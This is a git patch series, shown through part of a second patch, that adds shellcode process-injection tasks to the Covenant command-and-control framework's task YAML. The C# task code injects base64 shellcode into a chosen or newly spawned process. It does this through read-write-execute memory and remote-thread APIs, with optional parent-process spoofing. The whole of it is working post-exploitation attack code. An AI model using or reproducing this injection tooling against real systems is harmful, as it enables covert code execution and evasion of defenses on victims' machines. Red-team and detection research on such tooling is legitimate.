From 04cc2ca83e1f71c47e3a5eb4d00655279c5ce3ab Mon Sep 17 00:00:00 2001 From: salu90 Date: Wed, 23 Sep 2020 18:43:46 +0200 Subject: [PATCH 1/3] add processInjection tasks --- .../Data/Tasks/SharpSploit.Execution.yaml | 406 ++++++++++++++++++ 1 file changed, 406 insertions(+) diff --git a/Covenant/Data/Tasks/SharpSploit.Execution.yaml b/Covenant/Data/Tasks/SharpSploit.Execution.yaml index b78ae7c3..8bfeb097 100644 --- a/Covenant/Data/Tasks/SharpSploit.Execution.yaml +++ b/Covenant/Data/Tasks/SharpSploit.Execution.yaml @@ -1052,4 +1052,410 @@ DotNetVersion: Net35 EmbeddedResources: [] ReferenceAssemblies: [] + EmbeddedResources: [] +- Name: ProcessInjection + Aliases: [] + Author: + Name: '' + Handle: '' + Link: '' + Description: inject test + Help: + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string Technique, string ProcessID, string ShellCode)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (Technique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (Technique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (Technique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n //TODO review how to detect empty string \n else if (Technique == \"\" || Technique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + Technique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n {\n int ProcID = Int32.Parse(ProcessID);\n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"attempting to inject the provided shellcode into process \" + proc.ProcessName + \" with PID \" + ProcessID;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" + TaskingType: Assembly + UnsafeCompile: false + TokenTask: false + Options: + - Name: Technique + Value: '' + DefaultValue: CreateRemoteThread + Description: Injection technique + SuggestedValues: + - CreateRemoteThread + - NtCreateThreadEx + - RtlCreateUserThread + Optional: true + DisplayInCommand: true + FileOption: false + - Name: ProcessID + Value: '' + DefaultValue: '' + Description: Process ID of the process to impersonate + SuggestedValues: [] + Optional: false + DisplayInCommand: true + FileOption: false + - Name: ShellCode + Value: '' + DefaultValue: '' + Description: ShellCode to Inject. + SuggestedValues: [] + Optional: false + DisplayInCommand: false + FileOption: true + ReferenceSourceLibraries: + - Name: SharpSploit + Description: SharpSploit is a library for C# post-exploitation modules. + Location: SharpSploit\SharpSploit\ + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + ReferenceAssemblies: + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.dll + Location: net40\System.DirectoryServices.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.Protocols.dll + Location: net40\System.DirectoryServices.Protocols.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: System.IdentityModel.dll + Location: net40\System.IdentityModel.dll + DotNetVersion: Net40 + - Name: System.Management.Automation.dll + Location: net40\System.Management.Automation.dll + DotNetVersion: Net40 + - Name: System.Management.dll + Location: net40\System.Management.dll + DotNetVersion: Net40 + - Name: System.ServiceProcess.dll + Location: net40\System.ServiceProcess.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net35\System.XML.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net35\System.Windows.Forms.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.Protocols.dll + Location: net35\System.DirectoryServices.Protocols.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.dll + Location: net35\System.DirectoryServices.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: mscorlib.dll + Location: net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.IdentityModel.dll + Location: net35\System.IdentityModel.dll + DotNetVersion: Net35 + - Name: System.Management.Automation.dll + Location: net35\System.Management.Automation.dll + DotNetVersion: Net35 + - Name: System.Management.dll + Location: net35\System.Management.dll + DotNetVersion: Net35 + - Name: System.ServiceProcess.dll + Location: net35\System.ServiceProcess.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net40\System.Windows.Forms.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net40\System.XML.dll + DotNetVersion: Net40 + EmbeddedResources: [] + ReferenceAssemblies: [] + EmbeddedResources: [] +- Name: ProcessInjectionSpawn + Aliases: [] + Author: + Name: '' + Handle: '' + Link: '' + Description: aaa + Help: + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string Technique, string ProcessName, string ShellCode,string ParentPID)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (Technique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (Technique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (Technique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n //TODO review how to detect empty string \n else if (Technique == \"\" || Technique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + Technique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n if (ParentPID == \"\" || ParentPID == \"\\\"\")\n {\n ProcID = (int)Shell.CreateProcessPInvoke(ProcessName).dwProcessId;\n }\n else\n {\n int PPID = Int32.Parse(ParentPID);\n ProcID = (int)Shell.CreateProcessPInvokePPID(ProcessName,PPID).dwProcessId;\n }\n \n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"attempting to inject the provided shellcode into process \" + proc.ProcessName;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" + TaskingType: Assembly + UnsafeCompile: false + TokenTask: false + Options: + - Name: Technique + Value: '' + DefaultValue: CreateRemoteThread + Description: Injection technique + SuggestedValues: + - CreateRemoteThread + - NtCreateThreadEx + - RtlCreateUserThread + Optional: true + DisplayInCommand: true + FileOption: false + - Name: ProcessName + Value: '' + DefaultValue: '' + Description: Process ID of the process to impersonate + SuggestedValues: [] + Optional: false + DisplayInCommand: true + FileOption: false + - Name: ShellCode + Value: '' + DefaultValue: '' + Description: ShellCode to Inject. + SuggestedValues: [] + Optional: false + DisplayInCommand: false + FileOption: true + - Name: ParentPID + Value: '' + DefaultValue: '' + Description: ppid + SuggestedValues: [] + Optional: true + DisplayInCommand: true + FileOption: false + ReferenceSourceLibraries: + - Name: SharpSploit + Description: SharpSploit is a library for C# post-exploitation modules. + Location: SharpSploit\SharpSploit\ + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + ReferenceAssemblies: + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.dll + Location: net40\System.DirectoryServices.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.Protocols.dll + Location: net40\System.DirectoryServices.Protocols.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: System.IdentityModel.dll + Location: net40\System.IdentityModel.dll + DotNetVersion: Net40 + - Name: System.Management.Automation.dll + Location: net40\System.Management.Automation.dll + DotNetVersion: Net40 + - Name: System.Management.dll + Location: net40\System.Management.dll + DotNetVersion: Net40 + - Name: System.ServiceProcess.dll + Location: net40\System.ServiceProcess.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net35\System.XML.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net35\System.Windows.Forms.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.Protocols.dll + Location: net35\System.DirectoryServices.Protocols.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.dll + Location: net35\System.DirectoryServices.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: mscorlib.dll + Location: net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.IdentityModel.dll + Location: net35\System.IdentityModel.dll + DotNetVersion: Net35 + - Name: System.Management.Automation.dll + Location: net35\System.Management.Automation.dll + DotNetVersion: Net35 + - Name: System.Management.dll + Location: net35\System.Management.dll + DotNetVersion: Net35 + - Name: System.ServiceProcess.dll + Location: net35\System.ServiceProcess.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net40\System.Windows.Forms.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net40\System.XML.dll + DotNetVersion: Net40 + EmbeddedResources: [] + ReferenceAssemblies: [] + EmbeddedResources: [] +- Name: ProcessInjectionSpawnAs + Aliases: [] + Author: + Name: '' + Handle: '' + Link: '' + Description: aaa + Help: + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string Technique, string ProcessName, string ShellCode,string Username, string Password, string Domain, string ParentPID)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (Technique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (Technique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (Technique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n //TODO review how to detect empty string \n else if (Technique == \"\" || Technique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + Technique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n if (ParentPID == \"\" || ParentPID == \"\\\"\")\n {\n ProcID = (int)Shell.createProcessAsPInvoke(ProcessName, Domain, Username, Password).dwProcessId;\n }\n else\n {\n output += \"not implmented\";\n return output;\n //TODO\n // ADD FUNCTION IN SHARPSPLOIT\n //int PPID = Int32.Parse(ParentPID);\n //ProcID = (int)Shell.CreateProcessPInvokePPID(ProcessName,PPID).dwProcessId;\n }\n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"attempting to inject the provided shellcode into process \" + proc.ProcessName;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" + TaskingType: Assembly + UnsafeCompile: false + TokenTask: false + Options: + - Name: Technique + Value: '' + DefaultValue: CreateRemoteThread + Description: Injection technique + SuggestedValues: + - CreateRemoteThread + - NtCreateThreadEx + - RtlCreateUserThread + Optional: true + DisplayInCommand: true + FileOption: false + - Name: ProcessName + Value: '' + DefaultValue: '' + Description: Process ID of the process to impersonate + SuggestedValues: [] + Optional: false + DisplayInCommand: true + FileOption: false + - Name: ShellCode + Value: '' + DefaultValue: '' + Description: ShellCode to Inject. + SuggestedValues: [] + Optional: false + DisplayInCommand: false + FileOption: true + - Name: Username + Value: '' + DefaultValue: '' + Description: '' + SuggestedValues: [] + Optional: false + DisplayInCommand: true + FileOption: false + - Name: Password + Value: '' + DefaultValue: '' + Description: '' + SuggestedValues: [] + Optional: false + DisplayInCommand: true + FileOption: false + - Name: Domain + Value: '' + DefaultValue: '' + Description: '' + SuggestedValues: [] + Optional: false + DisplayInCommand: true + FileOption: false + - Name: ParentPID + Value: '' + DefaultValue: '' + Description: '' + SuggestedValues: [] + Optional: true + DisplayInCommand: true + FileOption: false + ReferenceSourceLibraries: + - Name: SharpSploit + Description: SharpSploit is a library for C# post-exploitation modules. + Location: SharpSploit\SharpSploit\ + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + ReferenceAssemblies: + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.dll + Location: net40\System.DirectoryServices.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.Protocols.dll + Location: net40\System.DirectoryServices.Protocols.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: System.IdentityModel.dll + Location: net40\System.IdentityModel.dll + DotNetVersion: Net40 + - Name: System.Management.Automation.dll + Location: net40\System.Management.Automation.dll + DotNetVersion: Net40 + - Name: System.Management.dll + Location: net40\System.Management.dll + DotNetVersion: Net40 + - Name: System.ServiceProcess.dll + Location: net40\System.ServiceProcess.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net35\System.XML.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net35\System.Windows.Forms.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.Protocols.dll + Location: net35\System.DirectoryServices.Protocols.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.dll + Location: net35\System.DirectoryServices.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: mscorlib.dll + Location: net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.IdentityModel.dll + Location: net35\System.IdentityModel.dll + DotNetVersion: Net35 + - Name: System.Management.Automation.dll + Location: net35\System.Management.Automation.dll + DotNetVersion: Net35 + - Name: System.Management.dll + Location: net35\System.Management.dll + DotNetVersion: Net35 + - Name: System.ServiceProcess.dll + Location: net35\System.ServiceProcess.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net40\System.Windows.Forms.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net40\System.XML.dll + DotNetVersion: Net40 + EmbeddedResources: [] + ReferenceAssemblies: [] EmbeddedResources: [] \ No newline at end of file From 352f5af157a90cf1960d79f1f14b367780e626e9 Mon Sep 17 00:00:00 2001 From: salu90 Date: Thu, 24 Sep 2020 18:36:34 +0200 Subject: [PATCH 2/3] minor fixes in injection tasks --- .../Data/Tasks/SharpSploit.Execution.yaml | 186 ++---------------- 1 file changed, 16 insertions(+), 170 deletions(-) diff --git a/Covenant/Data/Tasks/SharpSploit.Execution.yaml b/Covenant/Data/Tasks/SharpSploit.Execution.yaml index 8bfeb097..2c5beaca 100644 --- a/Covenant/Data/Tasks/SharpSploit.Execution.yaml +++ b/Covenant/Data/Tasks/SharpSploit.Execution.yaml @@ -1056,24 +1056,24 @@ - Name: ProcessInjection Aliases: [] Author: - Name: '' - Handle: '' + Name: 'Simone Salucci & Daniel López' + Handle: '@saim1z @attl4s' Link: '' - Description: inject test + Description: Injects and executes the specified shellcode into the process specified by the ProcessID parameter using one of the available techniques Help: Language: CSharp CompatibleDotNetVersions: - Net35 - Net40 - Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string Technique, string ProcessID, string ShellCode)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (Technique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (Technique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (Technique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n //TODO review how to detect empty string \n else if (Technique == \"\" || Technique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + Technique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n {\n int ProcID = Int32.Parse(ProcessID);\n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"attempting to inject the provided shellcode into process \" + proc.ProcessName + \" with PID \" + ProcessID;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" + Code: "using System;\nusing System.Diagnostics;\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string ExecutionTechnique, string ProcessID, string ShellCode)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (ExecutionTechnique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (ExecutionTechnique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (ExecutionTechnique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n else if (ExecutionTechnique == \"\" || ExecutionTechnique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + ExecutionTechnique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n int currentProcessID = Process.GetCurrentProcess().Id;\n if (ProcessID == \"\" || ProcessID == \"\\\"\")\n {\n ProcID = currentProcessID;\n output += \"PID not specified, shellcode will be injected into the current process\\n\";\n }\n else\n {\n ProcID = Int32.Parse(ProcessID);\n }\n \n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"Attempting to inject the provided shellcode into process \" + proc.ProcessName + \" with PID \" + ProcID;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}" TaskingType: Assembly UnsafeCompile: false TokenTask: false Options: - - Name: Technique + - Name: ExecutionTechnique Value: '' DefaultValue: CreateRemoteThread - Description: Injection technique + Description: The technique used to execute the specified shellcode. SuggestedValues: - CreateRemoteThread - NtCreateThreadEx @@ -1084,9 +1084,9 @@ - Name: ProcessID Value: '' DefaultValue: '' - Description: Process ID of the process to impersonate + Description: Process ID of the process to impersonate. If empty, the shellcode will be injected into the current process. SuggestedValues: [] - Optional: false + Optional: true DisplayInCommand: true FileOption: false - Name: ShellCode @@ -1178,24 +1178,24 @@ - Name: ProcessInjectionSpawn Aliases: [] Author: - Name: '' - Handle: '' + Name: 'Simone Salucci & Daniel López' + Handle: '@saim1z @attl4s' Link: '' - Description: aaa + Description: Creates a new process using the createProcess Win32 API call through PInvoke and injects and executes the specified shellcode using one of the available techniques Help: Language: CSharp CompatibleDotNetVersions: - Net35 - Net40 - Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string Technique, string ProcessName, string ShellCode,string ParentPID)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (Technique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (Technique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (Technique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n //TODO review how to detect empty string \n else if (Technique == \"\" || Technique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + Technique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n if (ParentPID == \"\" || ParentPID == \"\\\"\")\n {\n ProcID = (int)Shell.CreateProcessPInvoke(ProcessName).dwProcessId;\n }\n else\n {\n int PPID = Int32.Parse(ParentPID);\n ProcID = (int)Shell.CreateProcessPInvokePPID(ProcessName,PPID).dwProcessId;\n }\n \n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"attempting to inject the provided shellcode into process \" + proc.ProcessName;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" + Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string ExecutionTechnique, string ProcessName, string ShellCode,string ParentPID)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (ExecutionTechnique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (ExecutionTechnique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (ExecutionTechnique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;} \n else if (ExecutionTechnique == \"\" || ExecutionTechnique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + ExecutionTechnique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n if (ParentPID == \"\" || ParentPID == \"\\\"\")\n {\n ProcID = (int)Shell.CreateProcessPInvoke(ProcessName).dwProcessId;\n }\n else\n {\n int PPID = Int32.Parse(ParentPID);\n ProcID = (int)Shell.CreateProcessPInvokePPID(ProcessName,PPID).dwProcessId;\n }\n \n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"Attempting to inject the provided shellcode into process \" + proc.ProcessName;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" TaskingType: Assembly UnsafeCompile: false TokenTask: false Options: - - Name: Technique + - Name: ExecutionTechnique Value: '' DefaultValue: CreateRemoteThread - Description: Injection technique + Description: Injection technique. SuggestedValues: - CreateRemoteThread - NtCreateThreadEx @@ -1206,7 +1206,7 @@ - Name: ProcessName Value: '' DefaultValue: '' - Description: Process ID of the process to impersonate + Description: Full path of the new process to spawn (e.g. C:\windows\system32\notepad.exe). SuggestedValues: [] Optional: false DisplayInCommand: true @@ -1222,7 +1222,7 @@ - Name: ParentPID Value: '' DefaultValue: '' - Description: ppid + Description: PID of the parent process to spoof. SuggestedValues: [] Optional: true DisplayInCommand: true @@ -1305,157 +1305,3 @@ EmbeddedResources: [] ReferenceAssemblies: [] EmbeddedResources: [] -- Name: ProcessInjectionSpawnAs - Aliases: [] - Author: - Name: '' - Handle: '' - Link: '' - Description: aaa - Help: - Language: CSharp - CompatibleDotNetVersions: - - Net35 - - Net40 - Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string Technique, string ProcessName, string ShellCode,string Username, string Password, string Domain, string ParentPID)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (Technique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (Technique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (Technique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n //TODO review how to detect empty string \n else if (Technique == \"\" || Technique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + Technique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n 